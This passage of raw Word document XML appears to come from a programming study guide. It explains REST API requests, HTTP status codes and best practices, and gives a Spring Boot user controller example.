        </w:numPr>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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>PUT /users/1</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8D1DC" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0997E79A" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CAA08" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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email": "john.doe@newdomain.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C33B964" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C0BEA" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1851"/>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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21420100" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D338A" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1F2D77" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602023A4" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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email": "john.doe@newdomain.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C043CB2" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599944A4" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. DELETE Request (Delete user data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB2875" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1852"/>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Request</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>DELETE /users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C0B63" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1852"/>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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Status code: 204 No Content (No content returned, but the resource was deleted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CDAA9D" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST API Response Codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516EDC0" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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200 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Successful GET or PUT request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BABB8BD" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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201 Created</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Successful POST request, resource was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB0A45" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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204 No Content</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Successful DELETE request, no content to return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25CA37" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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400 Bad Request</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request was malformed or invalid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CB6EF4" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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401 Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The client is not authorized to access the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C71B7" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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403 Forbidden</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The client does not have permission to access the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553429D" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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404 Not Found</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource was not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F3F4C" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1853"/>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500 Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server encountered an error while processing the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C44A4" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00000000" w:rsidP="000A482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1E264AF">
          <v:rect id="_x0000_i2103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F020EFC" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST API Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D05B75B" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1854"/>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Use HTTP Methods Correctly</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use GET for retrieval, POST for creation, PUT for updates, and DELETE for removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5807C8" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1854"/>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Use Meaningful URIs</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Keep the URIs intuitive (e.g., /users/{id} for accessing a specific user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F68E2" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1854"/>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lastRenderedPageBreak/>
        <w:t>Stateless Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure each request contains all the information needed (authentication, parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D78F26" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1854"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use JSON or XML for Responses</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JSON is the most common format for RESTful APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309B97F9" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST API Example in Java (Spring Boot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21E5E6"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D9C79"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RequestMapping("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8815C"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public class UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB77120" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7BB623"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GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B072A92"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public User getUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8CBF4"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 Fetch user from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB509DC"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return userService.getUserById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F481BEE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C645F96" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B3ED6F"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PostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8A367"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public User createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1691655C"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 Save user to DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA4413"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return userService.createUser(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50427BF2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2199D419" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256A8D1D"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PutMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B456B3"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public User updateUser(@PathVariable Long id, @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EB73E"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 Update user in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78916E"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return userService.updateUser(id, user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FDC83"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B663B" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="173DBAB4"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DeleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363059FE"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public void deleteUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F92D80"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 Delete user from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D538B9A"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userService.deleteUser(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F4F69"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41365F63"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D53C8" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A408EE" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In short, a REST API works by allowing clients to interact with resources (such as data objects or services) using standard HTTP methods, following the principles of </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless communication</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniform interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each request is independent, and the server responds with the appropriate status and data, ensuring a scalable and maintainable architecture for distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109FEACD" w14:textId="72F2DB8F" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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ADC5D43">
          <v:rect id="_x0000_i2104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684BDF7" w14:textId="36AE694B" w:rsidR="00D84A87" w:rsidRPr="00CE4B95" w:rsidRDefault="00D84A87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="_Toc196307915"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00494C5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pplication</w:t>
      </w:r>
      <w:r w:rsidR="00494C5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
